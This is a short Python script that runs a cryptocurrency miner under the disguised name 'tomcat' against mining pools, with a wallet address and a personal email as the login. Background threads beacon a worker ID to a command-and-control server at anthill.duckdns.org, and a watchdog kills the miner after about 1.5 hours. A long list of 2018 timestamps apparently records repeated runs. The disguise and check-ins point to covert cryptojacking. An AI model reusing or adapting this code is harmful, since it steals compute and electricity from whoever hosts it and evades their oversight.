import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:41:03.794516
#2018-02-17 17:28:05.255573
#2018-02-17 19:17:04.347618
#2018-02-17 21:06:06.514850
#2018-02-17 22:50:01.746427
#2018-02-18 00:35:06.159135
#2018-02-18 02:25:04.640222
#2018-02-18 04:12:03.640099
#2018-02-18 06:02:06.275417
#2018-02-18 07:53:07.053529
#2018-02-18 09:40:09.648171
#2018-02-18 11:27:02.158453
#2018-02-18 13:13:04.507150
#2018-02-18 15:02:05.264799
#2018-02-18 16:50:01.307775
#2018-02-18 18:38:01.362864
#2018-02-18 20:26:06.808603
#2018-02-18 22:12:02.203154
#2018-02-19 00:01:04.616434
#2018-02-19 01:46:01.991156
#2018-02-19 03:34:05.031195
#2018-02-19 05:18:07.773742
#2018-02-19 07:04:06.899935
#2018-02-19 08:53:07.316989
#2018-02-19 10:42:05.929871
#2018-02-19 12:29:04.854833
#2018-02-19 14:16:08.215045
#2018-02-19 16:05:07.138653
#2018-02-19 17:52:08.659832
#2018-02-19 19:40:09.313571
#2018-02-19 21:29:04.326387
#2018-02-19 23:15:03.580142
#2018-02-20 01:03:01.824194
#2018-02-20 02:51:05.081150
#2018-02-20 04:38:05.514249
#2018-02-20 06:22:07.669668
#2018-02-20 08:07:07.112958
#2018-02-20 09:53:01.816717
#2018-02-20 11:37:05.877148
#2018-02-20 13:24:04.327194
#2018-02-20 15:09:07.293615
#2018-02-20 16:55:07.852021
#2018-02-20 18:44:05.362676
#2018-02-20 20:35:04.854333
#2018-02-20 22:19:06.910801
#2018-02-21 00:00:01.534978
#2018-02-21 01:44:05.372099
#2018-02-21 03:33:02.079685
#2018-02-21 05:22:03.624008
#2018-02-21 07:09:01.244281
#2018-02-21 08:54:06.717120
#2018-02-21 10:42:03.493638
#2018-02-21 12:30:02.111369
#2018-02-21 14:16:07.107430
#2018-02-21 16:03:07.408907
#2018-02-21 17:55:02.171677
#2018-02-21 19:40:08.313354
#2018-02-21 21:28:08.239131
#2018-02-21 23:13:05.376490
#2018-02-22 01:03:01.260598
#2018-02-22 02:50:02.831281
#2018-02-22 04:36:05.094952
#2018-02-22 06:21:06.785649
#2018-02-22 08:08:06.785606
#2018-02-22 09:54:08.671026
#2018-02-22 11:39:08.448424
#2018-02-22 13:26:07.328721
#2018-02-22 15:14:06.907993
#2018-02-22 16:58:04.403820
#2018-02-22 18:46:08.656318
#2018-02-22 20:39:06.459764
#2018-02-22 22:26:04.493410
#2018-02-23 00:11:05.784238
#2018-02-23 01:59:03.866526
#2018-02-23 03:34:07.019763
#2018-02-23 05:18:05.401249
#2018-02-23 07:03:05.631788
#2018-02-23 08:51:07.637055
#2018-02-23 11:06:10.709130
#2018-02-23 13:01:04.469716
#2018-02-23 14:47:04.345774
#2018-02-23 16:36:02.078097
#2018-02-23 18:23:02.082149
#2018-02-23 20:08:01.733687
#2018-02-23 21:55:07.561024
#2018-02-23 23:45:07.950071
#2018-02-24 01:37:01.886894
#2018-02-24 03:26:07.273364
#2018-02-24 05:11:07.734555
#2018-02-24 06:59:03.619574
#2018-02-24 08:49:05.732579
#2018-02-24 10:51:03.657102
#2018-02-24 12:38:01.309015
#2018-02-24 14:26:05.111018
#2018-02-24 16:14:05.052532
#2018-02-24 18:07:05.431998
#2018-02-24 19:53:05.600233
#2018-02-24 21:38:01.823378
#2018-02-25 00:28:04.034136
#2018-02-25 03:31:07.360584
#2018-02-25 07:19:07.183075